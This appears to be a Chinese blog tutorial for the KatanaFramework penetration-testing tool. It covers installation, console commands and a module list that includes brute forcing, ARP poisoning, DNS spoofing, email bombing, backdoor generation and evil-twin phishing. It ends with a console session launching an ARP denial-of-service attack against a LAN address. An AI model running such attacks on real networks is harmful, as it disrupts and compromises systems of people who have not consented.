渗透测试工具(KatanaFramework)

简介

katana是一个用python写的渗透测试框架，基于一个简单而全面的架构，供任何人来使用，修改和分享。

下载安装

git clone https://github.com/PowerScript/KatanaFramework.git
cd KatanaFramework/
安装依赖
chmod +x dependencies
./dependencies
安装
python install

使用

ktf.console

root@7c81645eb6d8:~/KatanaFramework# ktf.console 

                   mM@@MM@@MM@@MM@@MM@@MM@@@MMMMM@@@@Mm              
       ||========mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm===========||        
       ||        @MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm         ||
       ||        MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM@         ||
       ||        @@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM         ||
       ||        @MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM@         ||
       ||        @@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM         ||
       ||        @MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM@         ||
       ||========@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM=========||
       ||         /TT\mMMMMMMMMMMFRAMEWORKMMMMMMMMMMMMm           ||
       ||        (____)@MM@@MM@@MM@@MMMMMM@@MM@@Mm                ||
       ||        |# P |                                           ||
       ||        |# W |  Core     [ 1.0.0.1, Build: 0069 ]        ||
       ||        |#_N_|  Date     [ 25/12/16:14/03/17    ]        ||
       ||        |_  _|  Banner   [         SPACE        ]        ||        
       ||        /|__|\  Modules  [ 37 ] Tools [ 2 ]              ||
       ||       /__\/__\ The Hacking Framework                    ||
                 ()  ()

 [ktf]:

• 一些常用的指令

|Command|Quick Command|
-------|---------|-------|
show modules|showm|Show modules
show options|sop|Show options module
show full options|sfop|Show full options module
use|use|Use module
getinfo|getinfo | Show information of module
set|set |Change valor of a parameter
back|back|Backing or return
run|run|run Module
update|u|Update framework
exit|x|Exit of framework
invoke||Open a module in one new console
help|h|Show help
session||Session command
clear|c|Clear screen
s::|s::|Save Variable
x::|x::|Execute System Commands
f::|f::|Execute Functions

其实和使用mstasploit是差不多的啦

说一下最后的f::就是执行一些内置的函数
看一下内置函数列表

Name	Parameters	Description
get_aps()	Interface, timeout	Scan Access point's
get_interfaces()	None	Get Network Interfaces
get_monitors_mode()	None	Get Monitor Interfaces Wireless
start_monitor()	Interface	Start Monitor Mode in Interface
get_local_ip()	None	Get local IP
get_external_ip()	None	Get External IP
get_gateway()	None	Get Gateway/Router IP

比如你要显示当前机器的ip
你只要输入

[ktf]:f::get_local_ip()
  172.17.0.2

其他的同理
还有输入
x::ifconfig
就是执行系统命令来获取ip了

更多的使用方法看wiki
https://github.com/PowerScript/KatanaFramework/wiki/How-to-use

实战

 [ktf]:show modules

   CodeName         Description
  web/cp.finder         Administrator Panel Finder.
  web/sub.dns           Subdomain Bruteforce.
  web/bypass.sql        bypass SQLi with Cheats Injections.
  web/bt.form           Brute force to Form-based.
  web/bt.http           Brute force to Http Authentication.
  web/whois         Whois, DNS Lookup.
  web/clt.lfd           LFD Vulnerability Console.
  net/sf.arp            ARP tables Monitor.
  net/sc.hosts          Hosts live Scan in LAN.
  net/sc.scan           Scan [Ports, OS, Etc] IP.
  net/work.sniff        HTTP sniffer.
  net/arp.pson          ARP poisoning Attack.
  net/arp.dos           ARP D.O.S Attack.
  net/dns.spoof         DNS Spoofing.
  net/dns.fake          DNS fake Server Spoof.
  net/web.dos           Web D.O.S Attack in LAN.
  msf/back.door         Generate backdoors with MSF.
  set/web.hot           Gathering Information with web.
  set/em.boom           E-mail Boombing (SPAM).
  clt/cl.sql            Mysql Console Client.
  clt/cl.ftp            FTP Console Client.
  clt/cl.pop            POP Console Client.
  clt/cl.adb            ADB Console Client (Android).
  btf/pr.ftp            Brute Force to FTprotocol.
  btf/pr.sql            Brute Force to SQL protocol.
  btf/pr.ssh            Brute Force to SSH protocol.
  btf/pr.pop            Brute Force to POP3 protocol.
  anf/af.imagen         Forensic image analysis.
  fle/bt.rar            Brute Force to RAR file.
  fle/scan.file         Report of Virus Scan file.
  fle/bt.zip            Brute Force to ZIP file.
  mcs/gn.words          Generator Dictionaries.
  mcs/i.settup          Show Properties of System Current.
  mcs/ts.login          Test Credentials protocols.
  mcs/px.checker        Proxy list checker.
  wifi/ap.dos           Access Point D.O.S attack.
  wifi/ev.twin          Access Point Phising.

 [ktf]:use ney/arp.dos
 [ktf]:use net/arp.dos
  +[ktf](net/arp.dos):show options

  [options] [RQ]    [description]       [value]
  --------- ----    -------------       -------
  interface     yes Interface       eth0
  target    yes Target IP       192.168.1.223
  gateway   yes Gateway IP      192.168.1.254

  +[ktf](net/arp.dos):x::ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 0.0.0.0
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 51570  bytes 76514794 (72.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34792  bytes 2667790 (2.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  +[ktf](net/arp.dos):set target 192.168.1.100
             ↳--------> target = 192.168.1.100
  +[ktf](net/arp.dos):set gateway 192.168.1.1
             ↳--------> gateway = 192.168.1.1
  +[ktf](net/arp.dos):run
   [run] The module was launched...
   [inf] Tue Jun 27 09:06:34 2017
   [inf] Starting ARP D.O.S attack...
   |   [press-key] if you want to stop ARP D.O.S Attack (PRESS [ENTER])
   |